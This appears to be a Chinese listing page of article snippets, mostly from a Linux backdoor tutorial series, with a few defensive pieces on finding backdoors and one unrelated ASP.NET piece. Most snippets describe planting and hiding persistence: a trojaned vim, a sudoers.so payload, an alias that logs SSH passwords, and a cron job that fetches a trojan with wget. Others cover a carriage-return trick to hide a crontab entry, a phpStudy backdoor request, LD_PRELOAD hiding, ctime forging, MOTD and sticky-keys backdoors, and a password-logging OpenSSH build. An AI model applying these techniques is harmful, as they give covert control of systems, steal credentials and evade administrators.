首页
学习
活动
专区
工具
TVP
发布

Vim 后门 | Linux 后门系列

制作后门文件 1) 下载源代码 在相同版本的 Linux 主机 B 上下载相同版本 vim 源代码 在主机B上编辑更新源,取消 deb-src 的注释 在主机 B 上下载 vim 源代码(可以指定版本...) sudo apt update sudo apt install dpkgdev apt source vim 2) 加入后门代码 本次演示加入的恶意代码功能为新建 /tmp/flag.txt...sudo apt install libncurses-dev make sudo make install 查看编译生成的可执行文件 /usr/local/bin/vim 本地测试该文件后门代码是否有效...成功创建了有效的带有后门,且功能正常的 vim 3) 用后门vim替换 /usr/bin/vim 4) 模拟正常使用vim触发后门 成功触发后门 5) 小结 几乎每一种后门都可以用这样的方法...它提供了与 Python 3 的无缝集成,使你能够编写、运行和调试 Python 代码 vim 与 python3 主要通过以下三个命令或函数进行交互(从留后门的角度看) 1) python3 或 py3

49951
您找到你想要的搜索结果了吗?
是的
没有找到

sudo 后门|Linux 后门系列

有趣的特性,在极端条件下可能是系统的薄弱点;同时涉及一个没什么人关注的小知识点 sudo 配置后门 sudoedit 文件所有者后门 sudo plugin 后门 这篇文章以 Ubuntu Server...以超级权限 (root) 编辑文件 经过测试,我发现sudoedit 编辑文件的逻辑在一些场景下可能有一些问题,会造成权限提升、代码执行等 1) 运维人员通过 sudoedit 编辑文件 可以看到...本地找一台与目标环境相同的测试主机进行编译,我这里直接使用目标主机,编辑好后取出 sudoers.so ,之后还原为刚安装完的状态 查看 sudo 版本 sudo -V 下载相同版本的 sudo 程序的源代码并解压...https://www.sudo.ws/getting/source/ 注入 payload 进 sudoers.so 源代码 根据分析,我们在 sudoers_init 函数中插入 payload...注意转义双引号以及代码最后的分号 安装编译需要的依赖 sudo apt update sudo apt install gcc sudo apt install make sudo apt install

24910

alias后门 | Linux 后门系列

%h%m%s'`.log -e read,write,connect -s2048 ssh' 上面是我搜索了10多篇文章,发现的同一条后门命令,既然有前辈写了,咱们就分析分析 上面后门中,其实 alias...可以看到我们之前提交的数据,同时呢,这个文件返回的内容也比较多,只要改一个好点的名字可能会让安全管理人员认为是正常的文件 这种后门的场景就是用户登录到这台主机上后,使用这台主机的ssh去远程连接其他主机才能引发后门...,记录明文密码,这局限性太大了,顶多可以作为一个后门辅助。...经过我的一番寻找,加上自己所剩无几的经验,终于找到了一个目录 /etc/update-manager/ ,这个目录我跟你说,我一眼就相中了,这简直就是为后门设计的呀 ?...后门 ?

7.4K30

计划任务后门 | Linux 后门系列

3 * * * rm -r /home/xxxx/test/* 每隔10分钟下载一下我们的木马 */10 * * * * wget http://www.test.com/muma.exe 0x05 后门利用...0x06 巧用计划任务留后门 (crontab -l;printf "*/1 * * * * /home/helper/1.sh;\rno crontab for `whoami`%100c\n")|crontab...翻遍百度谷歌没人结合计划任务说过,结合c代码说的我也没太看懂,但是呢,经过尝试,加与不加都不耽误执行前面的计划任务,所以我就没太管...怎么可能不管,每一个未知命令都有可能造成亿万资金的损失,不知道这帮爹都咋寻思的...找一个代码数最多的进行篡改 ? 可以看到还是这个 popularity-contest 的代码是最多的,总拿它下手我都不好意思了 随便截取一行 ?...这里看着很适合做一些手脚,要么在这加一行恶意代码,当然了,通过变量的形式,将ip地址打碎,转换ascii进行转换,做全局变量 或者我们进行下行劫持,劫持 /usr/sbin/popularity-contest

6.3K50

网站漏洞扫描 phpstudy后门代码的分析与测试

phpStudy于近日被暴露出有后门漏洞,之前的phpStudy2016,phpStudy2018部分版本,EXE程序包疑似被入侵者植入木马后门,导致许多网站及服务器被攻击,被篡改,目前我们SINE安全公司立即成立...该后门文件是PHP环境当中的php_xmlrpc.dll模块被植入木马后门,具体的名称,经过我们SINE安全技术的安全检测,可以确定是phpstudy2016.11.03版本,以及phpstudy2018.02.11...Accept-Language: zh-CN,zh;q=0.6 Accept-Encoding:gzip Accept-Charset:=cGhwaW5mbyUyOCUyOSUzQg==(这个是POC代码加密的...Hm_lpvt_49143271fe785debb3b77f77f7c71752=1569485559; Connection: close 漏洞的执行位置是在数据包的Accept-Charset里,这里写入恶意代码加密的...如果您对代码不是太了解的话,也可以找专业的网站安全公司来处理解决,国内SINESAFE,启明星辰,绿盟都是比较不错的,目前该漏洞影响范围较广,请各位网站运营者尽快修复漏洞,打好补丁,防止网站被攻击,被篡改

1.5K40

如何在百万行代码中发现隐藏的后门

试想一下,如果你的网站被入侵,攻击者留下隐藏的后门,你真的都可以找出来嘛?面对一个大中型的应用系统,数以百万级的代码行,是不可能做到每个文件每段代码进行手工检查的。...通过与原始代码对比,可以快速发现文件是否被篡改以及被篡改的位置。当然,第一个前提是,你所在的团队已具备代码版本管理的能力,如果你是个人站长,相信你已经备份了原始代码。...本文将结合实际应用,介绍几种文件完整性验证方式,可以帮助你找出代码中所有隐藏的后门。...4、代码对比工具 关键词:代码对比工具,搜索一下,你会找到很多好用的工具。这里我们推荐两款效果还不错的工具,Beyond Compare和WinMerge。...3、双击具体文件,进入代码对比,找到代码差异部分。 ?

84730

LD_PRELOAD 后门 | Linux 后门系列

可以看到这里有一个 whoami ,我们就劫持它,思路如下: 覆盖这个函数,并且在内部重写 先把原函数指针赋值给一个变量 执行我们的代码 执行原函数 正常返回值 preload.c #include...加固后门 正常大家检查是否存在 LD_PRELOAD 后门的时候都是直接 echo $LD_PRELOAD ?...咱们把劫持 unalias 和劫持 alias 放在最后,先把这些命令都劫持一下: env 没有后门时候是这样的 ? 设置了后门之后是这样的 ?...成功劫持 export 没有设置后门时候是这样的 ? 设置后门后是这样的 ?...劫持成功 现在我们来进行验证后门还好用吗 ? 可以看到后门可以使用,那么现在我们来看一下以上各种方法还能否看见我们做的手脚 ? 完美!

7.1K20

修改后门ctime | Linux 后门系列

0x00 前情提要 在 alias 后门 | Linux 后门系列一文中,我们为了让后门完美一些,修改了后门文件的 atime、mtime,但是 ctime 一直没有办法修改,今天我们来把这一块补齐,...让后门更加完美 atime -> access time, 访问时间 mtime -> modify time,修改时间 ctime -> change time, 状态变化时间 最新版 Linux 中多了一个属性...所以可以查看 stat 的源代码,看一下 stat 应用是如何获取和管理 ctime 的,针对其调用的方法进行系统性地修改应该也是可以实现修改文件 ctime 的 0x03 系统时钟与硬件时钟 Linux...所以还是需要通过修改系统时间来进行 0x07 Ubuntu Server 22.10 实验 Ubuntu Server 即使断网使用 date -s 来修改系统时间,系统时间也会马上恢复 还是以 alias 后门那篇文章里的后门为例.../etc/update-manager/ 如果是需要执行的后门,现在执行并放置后台,如果像 alias 那种配置文件后门则不需要此章节 /etc/update-manager/release-update

5.3K20

ASP.NET重用代码技术 – 代码绑定技术

作者:苏红超   导读 代码绑定是ASP.NET提供的一个重要的新技术。...ASP.NET中的代码绑定技术   当你在建立自己的ASP.NET应用程序的时候使用代码绑定技术带来的一个主要的优点是:它可以让你很容易的将可见层(那些HTML代码和服务器端控件)同你的表现代码(...当我们使用代码绑定技术的时候,可视层的代码是存在于后缀为ASPX的文件当中。这是一个新的.NET扩展名,用来描述一个ASP文件。...在以前的ASP中很难做到一个页面当中没有任何脚本程序只有HTML代码(当然如果你毫无意义这样作也是可以的)。...当我们一步步通过代码绑定技术建立我们的搜索页面之后,我们就会能够看到代码绑定技术是如何实现一个代码重用的ASPX文件。为了使得ASP.NET程序正常运行,你必须安装.NET架构Beta1。

4.2K41

MOTD 后门引发的思考 | Linux 后门系列

最近看了苑房弘老师的打靶课程,发现了 MOTD 这个东西,于是研究了一下,发现很适合做后门,早在08年以前就有恶意软件使用了这种方式,今天系统地研究一下 motd,全称Message Of The Day...,是Linux中发送问候消息的功能,一般在我们登录服务器后显示 每次任意用户登录时都会触发motd服务的功能,这个功能的脚本几乎都是使用root 权限来启动的,所以很适合用来做后门 实用部分 随着关注我们的朋友越来越多...root权限 留后门 这个目录下的所有文件在任意用户登录后都会执行一遍,所以我们可以选择新建一个脚本或者修改其中的脚本来完成留后门的目的 以 00-header 文件为例 #!...User-Agent ,如果你阅读了 MOTD 简介部分的那篇文章,你应该知道这段代码组合 User-Agent 内容是什么,不知道也没关系,我们看到这段代码的最后一行是一堆变量的组合,我们可以直接将代码保存为一个...,但是考虑很多兄弟没看过之前的文章,所以这次重提一下 这个点说透以后,能用来做后门的可就不止 motd 这一个组件了,你可以想象一下,得有多少地方会使用 source或 .

7.1K00

后门攻击

它启动第二阶段 - 在服务器上下载并安装后门脚本。 后门壳去除的挑战 一旦安装,后门是非常难以清除的。传统上,检测涉及使用软件扫描程序在服务器文件系统中搜索已知的恶意软件签名。...后门外壳文件几乎总是通过使用别名和更重要的代码混淆(有时甚至是多层加密)来屏蔽。 由于许多应用程序构建在使用第三方插件的外部框架上,所以检测更加复杂; 这些有时会带有漏洞或内置后门。...依赖启发式和基于签名的规则的扫描器可能无法检测到此类框架中隐藏的代码。 即使检测到后门,典型的缓解方法(甚至系统重新安装)也不可能将其从应用程序中移除。...对于在可重写存储器中持续存在的后门来说尤其如此。 用INCAPSULA减轻后门外壳攻击 在Imperva Incapsula,我们使用多种方法来防止后门安装,以及检测和隔离现有的后门外壳。...通过追溯这种通信尝试,Incapsula服务可以识别任何后门外壳,即使其源代码被加密以避免扫描仪 。

2.3K30

Windows留后门–教程(五)——shift粘贴键后门

一、shift粘贴键后门介绍 Shift粘滞键是当用户连按5次shift就会自动弹出的一个程序,其实不光是粘滞键,还有各种辅助功能,这类辅助功能都拥有一个特点就是当用户未进行登录时也可以触发。...(辅助功能镜像劫持是一样的原理) 二、shift粘贴键后门-教程 前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器administrator权限 靶机: windows...Server2012 IP: 192.168.226.128 2.1 创建shift粘贴键后门 粘滞键的启动程序在C盘的Windows/system32目录下为sethc.exe。...cmd路径:C:\Windows\system32\cmd.exe 2.2 验证shift粘贴键后门 shift粘贴键后门创建完成之后,在锁屏状态下连按次shift粘贴键,C:\Windows...处置: 1、删除sethc.exe 更多资源: 1、web安全工具、渗透测试工具 2、存在漏洞的网站源码与代码审计+漏洞复现教程、 3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、

1.6K60

Openssh后门 – UbuntuCentos

这个后门真的又可怕又好用... 网上流传的都是Centos的版本,因为场景不同,我研究了一下针对Ubuntu,大同小异。...记录登录到本机的用户名和密码 */ #define OLOG "/tmp/.olog" /* 记录本机登录到远程的用户名和密码 */ #define SECRETPW "test" /* 后门的密码...记录登录到本机的用户名和密码 */#define OLOG "/tmp/.olog"           /* 记录本机登录到远程的用户名和密码 */#define SECRETPW "test" /* 后门的密码...ilog                                                                user:password --> root:toor 再用我们的后门密码...test,可以发现,只记录正常的密码,我们的后门密码并不记录。

2.9K20

PhpStudy 后门分析

在拿到样本后,我就对PhpStudy中的后门进行了一波逆向分析。...后门分析 最近关于讲phpstudy的文章很多,不过我只得到一个信息,后门在php_xmlrpc.dll文件中,有关键词:"eval(%s(%s))"。得知这个信息后,就降低了前期的工作难度。...研究了后门类型后,再来看看什么情况下会进入该函数触发该后门。...从这里可以知道,只要php成功加载了存在后门的xmlrpc.dll,那么任何只要构造对应的后门请求头,那么就能触发后门。在Nginx服务器的情况下就算请求一个不存在的路径,也会触发该后门。...修复方案也很简单,把php的php_xmlrpc.dll替换成无后门的版本,或者现在直接去官网下载,官网现在的版本经检测都不存后门

1.8K20
领券